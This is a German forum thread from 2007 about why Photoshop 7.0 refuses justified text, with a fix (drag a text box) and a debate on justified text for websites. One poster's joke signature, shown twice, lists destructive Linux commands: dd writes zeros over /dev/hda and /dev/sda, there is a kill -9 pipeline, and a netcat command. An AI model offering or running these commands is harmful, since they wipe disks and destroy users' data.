Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 7
Seite [1]
Julinator


Rock the board



Herkunft: Pfaffenhofen
Beiträge: 57
# Thema - 21.01.2007 um 16:05 Uhr
Hmm ich kann bei mir im Photoshop 7.0 keinen Text in den Blocksatz setzen, also ich kann das Blocksatz-Symbol nicht auswählen.

Woran liegt das? Wie krieg ich das weg? ^^

http://img156.imageshack.us/img156/2152/absatzst8.jpg
Inaktiv
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 1 - 21.01.2007 um 21:10 Uhr
er weiss ja nicht wo der rechte radn vom text ist. du kannst das symbol nur auswählen, wenn du beim erstellen des texten mit gedrückter maustaste ein textfeld gezogen hast.
wenn du nur einmal geklickt hast und das textfeld somit uneendlich groß ist, is blocksatz nicht möglich


------------------
www.laszlokorte.de

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 2 - 17.02.2007 um 06:42 Uhr
Gebe SCHIRI recht. Du musst ein Textfeld erstellen damit er weiß wo die Begrenzugen für die Texte liegen. Desweiteren würde ich, aufgrund der Lesbarkeit, lieber bei Linksbündig bleiben. Frag mich nicht warum dass so ist, aber das habe ich von vielen anderen auch schon an den Kopf bekommen dass man gerade bei Internetseiten auf Blocksätze verzichten sollte. Man muss aber nicht


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 3 - 17.02.2007 um 12:53 Uhr
hm.. ich finde blocksätzeum weutes besser les bar, als bündige texte, ausser es stehen in einer zeile nur 2 worte die mit 1cm abstand zwischen jedem buchstaben dar gestellt werden


------------------
www.laszlokorte.de

Inaktiv
|
rocco


Going for pro




Herkunft: Wiesbaden
Beiträge: 444
# Antwort: 4 - 19.02.2007 um 12:43 Uhr
aber das habe ich von vielen anderen auch schon an den Kopf bekommen dass man gerade bei Internetseiten auf Blocksätze verzichten sollte.

da muss ich schiri recht geben. gibt hier auch einen, der mal ein bischen was zu dem thema "typographie" im internet philosophiert hat:

http://www.coldheat.de/

meines erachtens eine seite von jemanden, der was von webdesign etc. versteht...


------------------
WS | rocco
Projektleiter Webmedia Solutions
[ www.webmedia-solutions.de ]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - -
FSK 12 heißt: Der Held kriegt das Mädchen
FSK 16 heißt: Der Böse kriegt das Mädchen
FSK 18 heißt: Jeder kriegt das Mädchen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Inaktiv
|
logaan


King for a day




Herkunft: Gütersloh
Beiträge: 209
# Antwort: 5 - 19.02.2007 um 15:55 Uhr
Blocksatz im Internet... igitt...


------------------
portfolio.
Clanpage Video Tutorial

TemplateDesigner 1.02
Templates anpassen war noch nie so einfach...

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 6 - 19.02.2007 um 17:49 Uhr
Blocksatz hin oder her. auf meinen Webseiten habeich es auch immer vorgezogen. Es gibt viele Geschmäcker, und die sind bekanntlic auch noch verschieden.

Man sollte es so machen wie es einem am besten gefällt.
Ich bevorzuge lieber das linksbündig.

Aber wie gesagt, jeder so wie er möchte


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Julinator
Thread-Ersteller


Rock the board



Herkunft: Pfaffenhofen
Beiträge: 57
# Antwort: 7 - 20.02.2007 um 12:44 Uhr
Jetzt hab ich den Thread ganz verschwitzt, sorry.
Naja, jetzt geht's! Danke Schiri! =)


Inaktiv
|
Antworten: 7
Seite [1]


Sie müssen sich registrieren, um zu antworten.